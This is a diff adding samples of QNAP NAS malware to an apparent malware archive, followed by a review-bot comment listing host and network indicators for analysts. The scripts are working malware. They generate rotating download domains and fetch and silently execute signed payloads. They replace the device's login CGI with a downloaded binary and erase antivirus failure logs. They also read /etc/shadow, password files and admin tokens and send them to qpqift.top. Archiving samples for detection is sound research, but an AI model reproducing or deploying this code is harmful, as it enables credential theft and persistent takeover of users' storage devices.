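+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+for ext in $domainexts; do
+hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+for host in $hostnames; do
+test -f "$outfile" && rm -f "$outfile"
+recentupdate=''
+curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+test -s "$outfile" || continue
+fsize=$(( $(wc -c < "$outfile") ))
+test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+test "$rsamsg" || continue
+path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+test "$rsadomain" = "${host}.${ext}" || continue
+timenow=$(date +%s)
+test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+test "$filehash" = "$hash" || continue
+curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+mv "${outfile}_s" "${ts}_v"
+chmod 755 "$outfile" || continue
+( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
+test "$recentupdate" -eq 1 && exit 0
+done
+done
+done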
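Review bot: This specimen is added under its hash with nothing beside it that tells an analyst what it is or what to hunt for; because the file cannot carry comments without changing that hash, the notes belong in a sidecar README in the same `2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS` directory. The host artefacts worth recording are all visible in the script: the working directory `${bdir}/.qpkg/.liveupdate`, the `.rsakey` file written there, and the `.tmp.XXXXXX` and `<ts>_v` files left next to it. On the network side it requests `/qnap_firmware.xml?t=<epoch>` with `curl -k`, against hostnames derived from `date +%s` divided by 1296000, so the candidate set changes every 15 days across the TLDs in `DOMAIN_EXT_A` and `DOMAIN_EXT_B`. The embedded public key in `verifykey` gates every downloaded payload and also appears in the 09ab3031… file of this commit, so it is probably the most stable indicator to match on across related samples.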
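--- a/2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/473c5df2617cee5a1f73880c2d66ad9668eeb2e6c0c86a2e9e33757976391d1a
+++ b/2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/473c5df2617cee5a1f73880c2d66ad9668eeb2e6c0c86a2e9e33757976391d1a
@@ -0,0 +1,389 @@
+#!/bin/bash
+ts=1549432800
+PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
+test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
+test -d "$bdir" && break; bdir=''
+done <<EOF
+$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
+EOF
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
+
+getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 3.4.1 -f /etc/config/qpkg.conf
+getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-01-25 -f /etc/config/qpkg.conf
+getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 20190125 -f /etc/config/qpkg.conf
+
+if grep "clamav\.net" /etc/hosts; then
+sed -i '/0.0.0.0 .*clamav\.net/d' /etc/hosts
+fi
+
+if grep '0\.0\.0\.0 update\.nai\.com' /etc/hosts; then
+sed -i '/0\.0\.0\.0 update\.nai\.com/d' /etc/hosts
+fi
+
+test -z "$PWD" && PWD=$(pwd)
+CWD="$PWD"
+if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
+CWD=''
+for dir in '.config' '.liveupdate'; do
+dir="${bdir}/.qpkg/${dir}"
+test -d "$dir" && cd "$dir" && CWD="$dir" && break
+done
+fi
+test "$CWD" && test -d "$CWD" && cd "$CWD"
+
+sedreplace () {
+local grepstring="$1" sedcmd="$2" file="$3"
+[ "$grepstring" ] && [ "$sedcmd" ] && [ "$file" ] || return 1
+if grep "$grepstring" "$file"; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
+sed -i "$sedcmd" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+return $?
+}
+
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+file=''
+[ -f "${path#*/}" ] && file="${path#*/}" || { [ -f "${bdir}/.qpkg/${path}" ] && file="${bdir}/.qpkg/${path}"; }
+if [ "x${file}" != 'x' ]; then
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
+verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
+sedreplace "$grepstring" "$sedcmd" "$file"
+sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
+grepstring='g4rwwSz1Bp1i1'"'"
+sedreplace "$grepstring" "$sedcmd" "$file"
+fi
+done
+file=''
+
+if [ ! -f '1548766800_c' ]; then
+if getcfg Antivirus AutoUpdateDBEnable -f /etc/config/antivirus.global | grep -i TRUE; then
+test -f '/mnt/HDA_ROOT/.logs/notice.log' && python <<"EOF"
+import sqlite3
+conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/notice.log')
+c = conn.cursor()
+c.execute("DELETE FROM NASLOG_NOTICE WHERE time > 1547096400 AND desc LIKE '[AntiVirus] Failed to update virus definitions%'")
+conn.commit()
+conn.close()
+exit()
+EOF
+test -f '/mnt/HDA_ROOT/.logs/event.log' && python <<"EOF"
+import sqlite3
+conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/event.log')
+c = conn.cursor()
+c.execute("DELETE FROM NASLOG_EVENT WHERE event_timet > 1547096400 AND event_desc LIKE '[AntiVirus] Failed to update virus definitions%'")
+conn.commit()
+conn.close()
+exit()
+EOF
+fi
+if getcfg MalwareRemover Enable -f /etc/config/qpkg.conf | grep -i 'true' || grep 'MalwareRemover' '/etc/config/crontab' '/tmp/cron/crontabs/admin'; then
+test -f '/mnt/HDA_ROOT/.logs/notice.log' && python <<"EOF"
+import sqlite3
+conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/notice.log')
+c = conn.cursor()
+c.execute("DELETE FROM NASLOG_NOTICE WHERE time > 1547964000 AND desc LIKE '[MalwareRemover] Malware Remover stopped%'")
+conn.commit()
+conn.close()
+exit()
+EOF
+test -f '/mnt/HDA_ROOT/.logs/event.log' && python <<"EOF"
+import sqlite3
+conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/event.log')
+c = conn.cursor()
+c.execute("DELETE FROM NASLOG_EVENT WHERE event_timet > 1547964000 AND event_desc LIKE '[MalwareRemover] Malware Remover stopped%'")
+conn.commit()
+conn.close()
+exit()
+EOF
+touch "1548766800_c"
+fi
+fi
+
+if [ ! -f ".qdisk_cmd" ]; then
+case "$(uname -m)" in
+*x86_64*)
+arch=x86_64
+binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
+;;
+*arm*|*aarch*)
+arch=arm
+binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
+;;
+*i*86*)
+arch=i486
+binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
+;;
+esac
+
+if [ "x${binhash}" != 'x' ]; then
+curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
+test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
+if [ "x${rsynchash}" = "x${binhash}" ]; then
+mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
+else
+rm -f '.qdisk_cmd.tmp'
+fi
+fi
+fi
+binhash=''; rsynchash=''
+
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+if [ -f "${path#*/}" ]; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${path#*/}"
+elif [ -f "${bdir}/.qpkg/${path}" ]; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${bdir}/.qpkg/${path}"
+fi
+done
+
+version=$(getcfg System Version)
+test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
+test "${version##*.}" -lt 3 || test "${version%%.*}" -lt 4 || test "$(version=${version#*.}; echo "${version%.*}")" -lt 3 && version=4.3.3 || { test "${version##*.}" -gt 5 && version=4.3.5; }
+
+if [ ! -d rssdoc ]; then
+command -v bunzip2 && compext=bz2 || compext=gz
+curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" && test -f "rssdoc.tar.${compext}" && rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)" && { test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA="; } && { test "$compext" = bz2 && tarflag=j || tarflag=z; } && tar -x${tarflag}f "rssdoc.tar.${compext}" || rm -f rssdoc.tar
+rm -f "rssdoc.tar.${compext}"
+fi
+
+rm -f /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
+ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
+
+if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
+internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
+localupdateurl="http://127.0.0.1:${internalwebport}"
+sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
+fi
+
+test -f '/etc/config/rssdoc/qpkgcenter_*.xml' || test -h '/etc/config/rssdoc/qpkgcenter_*.xml' && { test -f '.qdisk_cmd' && ./.qdisk_cmd -i '/etc/config/rssdoc/qpkgcenter_*.xml'; rm -f '/etc/config/rssdoc/qpkgcenter_*.xml'; }
+
+if find /etc/config/rssdoc | grep 'qpkgcenter_.*\.xml'; then
+:
+else
+cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
+fi
+
+for file in /etc/config/rssdoc/qpkgcenter_*.xml
+do
+if [ -f "$file" ] && { rm -f "$file" || [ ! -s "$file" ]; }; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
+touch "$file"
+cp -f "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+done
+file=''
+
+for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
+test -d "$qpkgdir" && break
+done
+test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
+test -d "${qpkgdir}/MalwareRemover/modules" || mkdir "${qpkgdir}/MalwareRemover/modules"
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover"
+
+if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
+for file in 10_derek_3.pyc 12_derek_3.pyc; do
+if [ ! -f "${qpkgdir}/MalwareRemover/modules/${file}" ] || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" || test -x "${qpkgdir}/MalwareRemover/modules/${file}" || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -gt 150 ] || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -lt 120 ]; then
+test -f '.qdisk_cmd' && test -f "${qpkgdir}/MalwareRemover/modules/${file}" && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover/modules/${file}" && rm -f "${qpkgdir}/MalwareRemover/modules/${file}"
+openssl base64 -d <<"EOF" >"${qpkgdir}/MalwareRemover/modules/${file}"
+A/MNCuVwTVxjAAAAAAAAAAABAAAAQAAAAHMLAAAAZQAAgwAAAWQAAFMoAQAAAE4o
+AQAAAHQEAAAAZXhpdCgAAAAAKAAAAAAoAAAAAHMVAAAAbW9kdWxlcy8xMF9kZXJl
+a18zLnB5dAgAAAA8bW9kdWxlPgEAAABzAAAAAA==
+EOF
+chmod -x "${qpkgdir}/MalwareRemover/modules/${file}"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
+fi
+done
+fi
+file=''; qpkgdir=''
+
+if [ ! -f .rsakey ]; then
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+fi
+
+cgibindir='/home/httpd/cgi-bin'
+if [ ! -f "1549101600_c" ] && [ -f "${cgibindir}/authLogin.cgi" ]; then
+test -f "1549101600_c" || touch "1549101600_c"
+case "$(uname -m)" in
+*x86_64*)
+arch=x86_64
+binhash='rrYwg0D4+4DxcDxYQsNTB4JUGlQ='
+;;
+*arm*|*aarch*)
+arch=arm
+binhash='Z4n2BZdhwjYf0wjM7GCW61WM9eU='
+;;
+*i*86*)
+arch=i486
+binhash='U3eHe6syQraRBGgsvkFZH3wibDw='
+;;
+esac
+
+if [ "x${binhash}" != 'x' ]; then
+curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal2_${arch}" || rm -f ".qal"
+test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
+if [ "x${rsynchash}" = "x${binhash}" ]; then
+test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod 755 "${cgibindir}"/authLogin.cgi
+fi
+test -f '.qal' && rm -f '.qal'
+fi
+fi
+
+if [ -f "${cgibindir}"/authLogin.cgi ] && "${cgibindir}"/authLogin.cgi | grep '<QDocRoot'; then
+:
+else
+test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+fi
+
+test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
+if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
+sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
+lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
+sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
+kill -2 "$sshpid"
+fi
+
+if [ ! -f '1548997200_c' ]; then
+touch '1548997200_c'
+mdir=`mktemp -d /tmp/.mount.XXXXXX` || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } || mdir=`mktemp -d "${bdir}/.mount.XXXXXX"` || { mdir="${bdir}/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/mnt/HDA_ROOT/.mount.XXXXXX"` || { mdir="/mnt/HDA_ROOT/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/.mount.XXXXXX"` || { mdir="/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "./.mount.XXXXXX"` || { mdir="./.mount.jbbxQob"; mkdir ${mdir}; }
+__BOOT_DEV=
+__model=`getcfg System "Internal Model"`
+CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
+CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
+CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
+__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
+command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
+test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
+test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }
+
+if [ $? -eq 0 ] || mount | grep "$mdir" >/dev/null; then
+for file in "${mdir}"/K01* "${mdir}/autorun.sh" '/tmp/config/autorun.sh'; do
+if [ -f "$file" ]; then
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
+verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
+sedreplace "$grepstring" "$sedcmd" "$file"
+sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
+grepstring='g4rwwSz1Bp1i1'"'"
+sedreplace "$grepstring" "$sedcmd" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+done
+fi
+umount "$mdir"
+rmdir "$mdir"
+fi
+
+if [ ! -f '1548914400_c' ]; then
+touch '1548914400_c'
+key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
+{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/ssmtp/ssmtp.conf /etc/config/smbpasswd /etc/shadow /etc/config/uLinux.conf /etc/default_config/uLinux.conf /mnt/HDA_ROOT/.config/qnapddns.conf /mnt/HDA_ROOT/.config/qid.conf /etc/platform.conf /etc/default_config/BOOT.conf /etc/default_config/Model_Name.conf /etc/config/qid.conf /etc/config/qddns_users.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; printf '%s:' "display_name"; /sbin/get_display_name; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
+fi
+
+if [ ! -f 1549429200_c ]; then
+touch 1549429200_c
+test -f liveupdate.sh && cronscriptpath=.liveupdate/liveupdate.sh || { test -f backup_conf.sh && cronscriptpath=.config/backup_conf.sh; }
+
+if [ ! -z $cronscriptpath ]; then
+{ { crontab -l || cat /etc/config/crontab; } | grep -v '^#' | awk '{ print $6 }'; sed -n 's/^ \?[Ss]hell \?= \?//p' /etc/config/qpkg.conf; } | grep '/' | sort | uniq | while IFS= read -r line; do
+test ! -z "$line" || continue
+test -f "$line" || continue
+test "$line" = $(pwd)/liveupdate.sh || test "$line" = $(pwd)/backup_conf.sh && continue
+rm .tmp.cronCDhLbZ
+head -n 1 "$line" >.tmp.cronCDhLbZ && grep '^#!/bin/b\?a\?sh' .tmp.cronCDhLbZ || { rm -f .tmp.cronCDhLbZ; continue; }
+cat >>.tmp.cronCDhLbZ <<"XXEOF"
+( exec >/dev/null 2>&1; (
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -d "$confdir" || confdir=/etc/config
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
+\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
+//I;s/\(^\|\
+\)\[[^\
+]\+\]\
+.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
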